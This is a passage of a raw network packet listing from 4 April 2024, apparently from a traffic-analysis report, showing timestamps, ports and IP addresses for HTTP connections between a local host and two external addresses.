Apr 4, 2024 17:49:07.596777916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.596792936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.596810102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.596827984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.596882105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.596913099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.596919060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.596934080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.596962929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597018003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597031116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597060919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597122908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597160101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597173929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597196102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597213030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597233057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597245932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597266912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597282887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597331047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597366095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597376108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597433090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597445011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597456932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597465038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597490072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597501993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597579002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597590923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597603083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597611904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597628117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597636938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597650051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597672939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597682953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597696066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597713947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597732067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597738981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597771883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597809076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597848892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597862005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597881079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597906113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597907066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597922087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597953081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.597976923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.597990036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598001957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598022938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598043919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598059893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598073006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598103046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598118067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598129988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598144054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598155975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598164082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598185062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598197937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598202944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598227978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598232985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598257065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598274946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598299980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598300934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598315954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598340034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598345995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598372936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598411083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598423958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598437071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598443985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598463058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598479033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598584890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598597050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598629951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598650932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598668098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598680973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598692894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598716021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598737001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598752975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598797083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598810911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598829031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598853111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598864079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598877907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.598891973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598908901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.598990917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599004984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599018097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599030972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599042892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599045038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599067926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599071980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599086046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599107981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599117994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599148989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599159002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599231005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599265099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599283934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599307060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599343061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599349022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599364042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599376917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599389076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599406004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599421978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599478960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599492073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599504948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599528074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599544048 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599553108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599565983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599589109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599595070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599613905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599639893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599666119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599675894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599706888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599723101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599735975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599747896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599777937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599796057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599802017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599816084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599837065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599855900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599879980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599894047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599915981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599931002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.599941969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599956989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.599987984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600009918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600023031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600034952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600042105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600068092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600069046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600083113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600095987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600115061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600141048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600147009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600166082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600172043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600194931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600234985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600248098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600280046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600284100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600397110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600423098 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600435972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600447893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600471020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600481987 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600492954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600492954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600512981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600519896 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600533009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600579023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600591898 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600599051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600605011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600624084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600639105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600644112 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600661993 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600684881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600689888 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600704908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600716114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600739956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600739956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600742102 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600776911 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600790024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600821972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600857973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600869894 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.600883007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600893974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600902081 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600919008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600930929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600955009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600960970 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.600966930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.600966930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.600990057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601006985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601016045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601027966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601059914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601084948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601099014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601110935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601133108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601149082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601154089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601166964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601197004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601218939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601268053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601279974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601293087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601310968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601336002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601336002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601350069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601387024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601392031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601406097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601418018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601438999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601454973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601464033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601488113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601520061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601540089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601572037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601577997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601587057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601598978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601619959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601624012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601659060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601685047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601686954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601708889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601727962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601732969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601743937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601762056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601777077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601778984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601804018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601809025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601846933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601852894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601861954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601875067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601881027 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601898909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601914883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.601927042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601939917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.601972103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602014065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602026939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602039099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602049112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602051020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602083921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602099895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602111101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602114916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602140903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602157116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602159023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602193117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602211952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602226019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602262974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602339029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602370024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602396965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602446079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602478027 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602479935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602494955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602528095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602545023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602557898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602579117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602601051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602606058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602638006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602663040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602675915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602688074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602706909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602729082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602732897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602755070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602758884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602778912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602792978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602814913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602817059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602850914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602869987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602883101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602900982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602925062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602929115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602942944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602956057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602960110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602969885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.602981091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.602991104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603004932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603008986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603037119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603039980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603055000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603071928 CEST	49730	80	192.168.2.10	103.23.232.80
